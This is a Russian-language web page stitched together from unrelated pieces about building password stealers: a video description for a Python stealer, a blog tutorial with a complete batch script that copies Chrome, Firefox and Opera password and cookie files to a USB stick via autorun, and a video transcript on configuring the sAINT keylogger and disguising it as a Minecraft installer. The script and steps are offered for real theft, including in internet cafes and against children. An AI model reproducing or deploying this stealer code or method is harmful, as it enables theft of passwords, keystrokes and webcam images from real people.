Как сделать стиллер паролей на python

Добавил пользователь Владимир З.
Обновлено: 04.10.2024

Xuất bản 19 Th01, 2022
Привет народ, в данном видеоролике я покажу вам как работает стиллер на языке программирования python. Так же я научу вас компилировать python скрипты в exe.
НАРОД ПРИНОШУ БОЛЬШИЕ ИЗВИНЕНИЯ Я ЗАБЫЛ УПОМЯНУТЬ ЧТО ПРЕЖДЕ ЧЕМ ЗАПУСКАТЬ compile.bat НАДО В КОНСОЛИ ВСТАВИТЬ ЭТО:

pip install ip2geotools
pip install requests
pip install pywin32
pip install opencv-python
pip install Pillow
pip install pyTelegramBotAPI
pip install psutil
pip install GPUtil
pip install tabulate
pip install pycryptodome

ТО ЕСТЬ УСТАНОВИТЬ МОДУЛИ. ИЗВИНИТЕ ЕЩЁ РАЗ.

Мой Telegram канал: t.me/Bad_Decision
Мой Instagram: i__will_change_.

NHẬN XÉT • 55

В моём телеграм канале есть код для отправки без архива

Traceback (most recent call last):

Интересная разработка! Не понял только: в 479й строке кода почему обращение к api через requests? Разве нет модуля для работы с api телеграма?

Сегодня мы поговорим о том, как создать стиллер паролей для браузеров, которые работают под операционной системой Windows. Он будет работать быстро и точно, а самое главное, что на него не будут ругаться антивирусы. Писать стиллер паролей мы будет в обычном блокноте, в конце сохраним его как .bat. У нас уже есть статья, где мы говорили о создании шуточных вирусов – читать.

Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.

Не ругается антивирус;
Скорость работы;
Простота в доработке;
Возможность мгновенного запуска;
Портативность.

Autorun не работает на Windows 8+;
Постоянное созданиеудаление autorun.inf;
Личное присутствие;
Только для Windows.

Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов

Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.

Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.

Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.

Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.

Постоянное созданиеудаление autorun.inf – если вы вставите флешку в ПК, а потом пойдёте домой и у вас Windows 8.1 или ниже, то пароли обновятся из-за авторана. Чтобы этого избежать его нужно постоянно удалять, однако в нашем скрипте уже всё есть. Он будет удален автоматически после запуска.

Создаём стиллер паролей для браузеров

Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.

Создаём текстовый документ и пишем туда следующий код:

@echo off
md %~d0Mozilla
md %~d0Opera
md %~d0Google
CD/D %APPDATA%OperaOpera
copy /y wand.dat %~d0Opera
copy /y coockies.dat %~d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y coockies.sqlite %~d0Mozilla
copy /y key3.db %~d0Mozilla
copy /y signons.sqlite %~d0Mozilla
copy /y AppData%MozillaFirefoxProfiles*.def-ault %~d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
copy /y “%localappdata%GoogleChromeUser DataDefaultLogin Data” “%~d0/Google”
ATTRIB -R -A -S -H
attrib +h %~d0Mozilla
attrib +h %~d0Opera
attrib +h %~d0Google
del: Autorun.inf

Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.

Теперь нужно создать файл autorun.inf со следующей командой:

Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.

Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.

Zip File, мамкины хацкеры. Как жизнь? Как карантинчик? Устали поди дома сидеть без дела. Ну не печальтесь. Нынче старина Денчик порадует вас годнотой. На повестке дня у нас вредоносная программка sAINT. Она относится к категории кейлоггеров и распространяется, как правило через почтовый спам или посредством интеграции в варезный софт.

Т.е., к примеру, вы хотите скачать какую-нибудь прогу или игрушку с торрента. Загружаете, накатываете, и даже пользуетесь в своё удовольствие некоторое время. А тем временем кейлоггер в фоновом режиме сливает на почту злоумышленника скриншоты вашего экрана и все нажатые клавиши.

Как это возможно? Да очень просто. Если у вас не установлен нормальный антивирус, то вы даже не заметите присутствия подобной программы на своей машине. Она никак не палится и не акцентирует на себе внимание.

Словить такой кейлоггер по случайности может каждый. От малограмотного школьника, желающего поскорее порубиться в майнкрафт до вполне себе опытного, но одновременно в крайней степени самонадеянного сисадмина.

А потом накатывают кодек-пак скачанный по первой ссылке в Яндексе и годами даже не догадываются о наличии заразы на своём же компе. Именно по этой причине грамотные админы и безопасники никогда не пользуются сборками винды, драйвер-паками и уж тем более сторонними WPIками.

Но друзья, давайте, я не буду пугать вас почём зря. Спустя пару минут вы и сами увидите, каким образом злоумышленники изготавливают свой хакерский софт и оборачивают его в красивую оболочку. На всякий случай уберите детей от экрана. Погнали.

sAINT в KaliLinux

Шаг 1. Запускаем Kali Linux и открываем окно терминала. Если впервые зашли на канал и не отупляете, что за Kaliи как её установить, специально для вас в углу всплывёт ссылочка на соответствующий ролик.

Шаг 3. Далее у нас длиннющая партянка с установкой необходимых для работы скрипта библиотек.

Шаг 4. И наконец копирование sAINT’а из репозитория гитхаба.

Шаг 5. Дождавшись завершения операции заходим в каталог.

Шаг 6. И чмодим конфигурационный файл скрипта. Иначе запустить его не получится.

Шаг 7. Запускаем его.

Шаг 8. И дождавшись, когда скрипт скачает и установит все допы, вводим в приветственном окне команду запуска JAVA-конструктора нашего кейлоггера. Читаем дисклеймер. Он в принципе похож на тот, что вы наблюдали в самом начале этого видео. ENTER.

Шаг 9. Айда чудить. Прежде всего нам необходимо ввести e-mail на который будут пересылаться логи с компа жертвы. Рекомендую создавать новую отдельную почту под это дело, т.к. далее мы будем вводить от неё пароль и фиг его знает, что мог интегрировать в данный скрипт хитрый разраб. Лучше перестраховаться. Почту нужно сделать именно на gmail’е. С другими ящиками не фурычит.

Шаг 10. Вводим парольчик.

Шаг 12. Теперь тонкая настройка. Кейлоггер спрашивает, делать ли скриншоты экрана? Конечно делать. Отправлять ли снимки с веб-камеры? Естественно. Фиксировать нажатия клавиш? Это вообще основа. Сохранять все эти данные на компьютере. Пускай. И через какое количество набитых на клавиатуре символов формировать очередное письмо. Напишу, что-нить меньше сотки, дабы продемонстрировать вам всю прелесть.

Шаг 13. Проверяем всё ли настроили, как нужно и если да, жмём Y.

Шаг 14. Программка скомпилировалась. Далее нужно из результата компиля создать EXE-файл. Ещё раз Y. И подтверждаем.

Шаг 15. Проверяем наличие вредоносного EXE'шничка перейдя в каталог sAINT – target. Вот он, родненький.

Шаг 16. Закидываем его на флешку.

Шаг 17. И переходим к работе под виндой. В том виде, в котором сейчас находится наш шпион, он никому не интересен. На такой никто не нажмёт. Давайте придадим ему презентабельный вид и зашьём в установочный архив с игрой Minecraft. Я заранее скачал её установщик и иконочку, очень похожую на родную. Выделяем наши EXE’шники и добавляем в новый архив.

Шаг 18. Тип – RAR4. Самораспаковывающийся. Переименовываем в Minecraft Setup, чтоб было максимально реалистично.

Шаг 23. Вот и он. Запускаюс. Опачки, тот нюанс о котором я нарочно не предупредил вас в самом начале. Данный скрипт основан на Java. И соответственно работает тоже, только на компьютерах с установленной явой. Если же на ПК её нет, то он попросту не запустится. Однако, все те кто играют в тот же Майнкрафт знают, что без явы игрушечка не работает. Поэтому пользователю ничего не остаётся, кроме как скачать и установить недостающий компонент в систему.

Шаг 24. Ставим яву.

Шаг 25. И пробуем снова запустить нашу игрушку. Вуаля. Всё взлетело. В этот момент наивный ребёнок начинает играть, а хацкер на том конце начинает получать логи. Причём начинает он, как вы видите с игровых данных. Какова вероятность того, что школьник будет использовать аналогичные, скажем для входа в STEAM?

Шаг 26. Дабы слегка ускорить процесс отправки, открою блокнот и набью побольше символов ради эксперимента. Бам. Бам. Бам. Достаточно. Проверим мыльцо.

Шаг 27. Ох, сколько налетело. И самое пугающее, что внутри, помимо текста, ещё и скрины. А если бы у меня ещё была подключена вебка, то…вы понимаете, о чём я.

Те, кто смотрел мой ролик про IT-вакансии в Darknet наверняка помнят, что самой востребованной и высокооплачиваемой профессией среди чёрного братства являются именно хакеры, сливающие личные данные пользователей на тематических форумах.

Одним из способов получения доступа к таким данным являются именно подобные программы распространяемые в клирнете посредством варезного софта, игр и почтового спама.

К слову, самые ленивые даже не утруждаются расшифровывать логи, а тупо продают ящик с собранной базой на конкретного человека. Купил за дёшево и сиди расшифровывай в своё удовольствие. Авось повезёт.

Такие дела малята. Но знаете, я был бы не я, если бы просто закончил ролик на этой ноте и оставил вас без действенного противоядия. Вдруг вы по неведомой мне причине решили повторить действия, описанные в ролике.

Очень надеюсь, что это не так, но всё же для профилактики оставлю вам ссылку на батник, запустив который вы сможете удалить с вашего ПК на винде вредоносную прогу sAINT и навсегда убрать её из автозагрузки.

Ну а вообще, если уж сидите под виндой, старайтесь по возможности использовать платный антивирус, никогда не устанавливать пиратский софт и ни в коем случае не открывать файлы из сомнительных писем.

Интернетом кстати тоже не пользуйтесь. Очень опасно. Друзья, на этом будем заканчивать. Если впервые забрёл на канал, то непременно клацни на колокольчик подписки. Нажмёшь на этого засранца и в твоей ленте будут регулярно появляться мега-крутые ролики по взлому, пентестингу и информационной безопасности.

С олдов, как обычно по лайку. Если соберёте полтинник, то выпущу видосик в котором расскажу и естественно покажу, как самые опасные ребята из тёмных подвалов и прокуренных комнат взламывают ваши почтовые ящики.

Думаю, будет занятно. С вами был Денис Курец. Всем удачи, успехов, отличного настроения. Берегите себя и свои данные. Почаще меняйте пароли. И главное. Избегайте сомнительных ссылок. Клик по ним ни к чему хорошему не приведёт. До новых встреч, ребятки. Всем пока.